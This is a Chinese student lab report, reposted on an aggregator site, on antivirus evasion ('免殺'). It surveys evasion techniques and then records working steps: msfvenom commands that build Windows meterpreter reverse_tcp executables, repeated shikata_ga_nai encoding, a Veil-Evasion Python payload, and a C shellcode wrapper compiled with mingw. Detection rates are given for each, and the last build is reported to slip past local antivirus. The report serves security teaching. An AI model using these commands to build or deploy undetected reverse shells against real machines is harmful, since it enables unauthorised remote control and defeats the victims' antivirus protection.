20145317 《網絡對抗技術》免殺原理與實踐

免殺技術

技術分類

改變特征碼

加殼：使用專業的加殼軟件，掩蓋特征碼；

使用encode等進行編碼，進行異或、+1、-1等類似操作改變特征碼；

使用其他語言進行重寫再編譯，如veil-evasion。

改變攻擊行為

反彈式連接能大大減少被阻止查殺的風險；

在正常應用軟件中插入惡意代碼；

將惡意代碼加密，運行惡意代碼后再解密進行惡意操作；

非常規方法

使用一個有漏洞的應用當成后門，編寫攻擊代碼集成到如MSF中。

使用社工類攻擊，誘騙目標關閉AV軟件。

純手工打造一個惡意軟件

基礎問題回答

1.殺軟是如何檢測出惡意代碼的？

創建特征碼庫，對惡意代碼的特征碼進行匹配，匹配到即為惡意代碼；

看該代碼是否被流行免殺加殼軟件加殼，如果有可能就是惡意代碼；

根據該代碼是否有惡意行為來判別，若有惡意的行為，我們就認為該代碼是惡意代碼。

2.免殺是做什么？

免殺就是通過改變惡意程序的明顯特征等信息，一種能使病毒木馬避免被殺毒軟件查殺的技術。

3.免殺的基本方法有哪些？

改變特征碼

加殼：使用專業的加殼軟件，掩蓋特征碼；

使用encode等進行編碼，進行異或、+1、-1等類似操作改變特征碼；

使用其他語言進行重寫再編譯，如veil-evasion。

改變攻擊行為

反彈式連接能大大減少被阻止查殺的風險；

在正常應用軟件中插入惡意代碼；

將惡意代碼加密，運行惡意代碼后再解密進行惡意操作；

實驗步驟

實踐過程記錄

msfvenom直接生成meterpreter可執行文件

• win8的IP地址：192.168.199.237
• Kali的IP地址：192.168.199.109
• 使用msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.199.109 PORT=302 -f exe > fool.exe命令生成meterpreter可執行文件fool.exe
• 使用ncat將文件傳輸到win8主機
• 電腦管家檢測到fool.exe惡意軟件并刪除，找回文件即可
• 我們上http://www.virscan.org/這個網站檢測一下有多少查毒軟件可以將其查殺出來
  • 點擊瀏覽選項，自行選中所要檢測的程序：fool.exe，隨后點擊掃描一下即可。

• 檢查結果如下：

• 有21/39的殺毒軟件發現有病毒

Msfvenom使用編碼器生成meterpreter可執行文件

1）一次編碼

• 使用msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b ‘\x00’ LHOST=192.168.1.118 LPORT=5317 -f exe > 5317dd.exe命令生成編碼過的可執行文件5317dd.exe

• 我們發現被編碼后的payload大小為360字節，上面直接生成的payload大小為333字節，但是最終文件的大小都是73802字節。

• 以上述相同方法傳送給win8主機后再次檢測：

（2）8次編碼

• 編碼八次：msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 8 -b ‘\x00’ LHOST=192.168.1.118 LPORT=5317 -f exe > 5317pp.exe

• 由上圖發現每編碼一次，信息都會顯示出來，而且每次payload增加27字節，最終payload大小為549字節，但是文件最終大小仍為73802字節

• 再來檢測一下：

• 在編碼8次之后，有21/39的殺毒軟件檢測出了有問題

• 我們發現，一般的殺毒軟件對于編碼這種免殺方法都是有防御性的

• 使用Veil-Evasion生成可執行文件

  • wins的IP地址：192.168.1.118

  • 在Kali中打開veil-evasion：直接在終端輸入veil-evasion即可（如果是自己安裝的kali可以用sudo apt-get veil-evasion下載一個）

  • 在該界面下輸入命令：use python/meterpreter/rev_tcp,出現結果如下圖所示：

  • 使用set LHOST 192.168.1.118命令將LHOST設為Kali的IP

  • 輸入命令generate，進入到如下界面

  • 接下來我們輸入自己生成的可執行文件的名字：5317py

  • 他會詢問我們選擇哪種編寫方式，我們選擇1，用python語言來編寫，最終出現如下界面

  • 這里的端口我忘改了，不過這個也就和msf一樣，自己隨便設置就好。

  • 該可執行文件存在kali計算機的/var/lib/veil-evasion/output/compiled/文件夾里，點擊即可找到相應的文件夾：

  • 檢測結果如下：

  • 有10/39的殺毒軟件報告發現有病毒，效果還是不錯的

  使用C語言調用Shellcode

• 使用msfvenom -p windows/meterpreter/reverse_tcp LHOST=攻擊者IP LPORT=5317 -f c命令生成一個C語言shellcode數組
  

• 創建一個C文件：MSSC.c（意為免殺shellcode），將上面生成的數組copy到該文件下，并加入一個主函數：
  

• 使用i686-w64-mingw32-g++ MSSC.c -o MSSC_5317.exe命令將該C語言代碼MSSC.c轉換為一個可在64位windows系統下操作的可執行文件MSSC_5317.exe

• • 將上面生成的數組copy到win8的主機上，用vs2013編寫一個C程序并編譯

  • 在Kali下使用msf監聽運行剛剛編譯生成的可執行文件，成功獲取權限：

  • 檢測一下：
    

  • 有5/39的查殺軟件發現了病毒，比上一個超簡單的C程序厲害了一點

  • 我們找到C可執行文件的位置，用電腦管家掃描一下，成功免殺。

轉載于:https://www.cnblogs.com/5317p/p/6624058.html

總結

以上是生活随笔為你收集整理的20145317 《网络对抗技术》免杀原理与实践的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。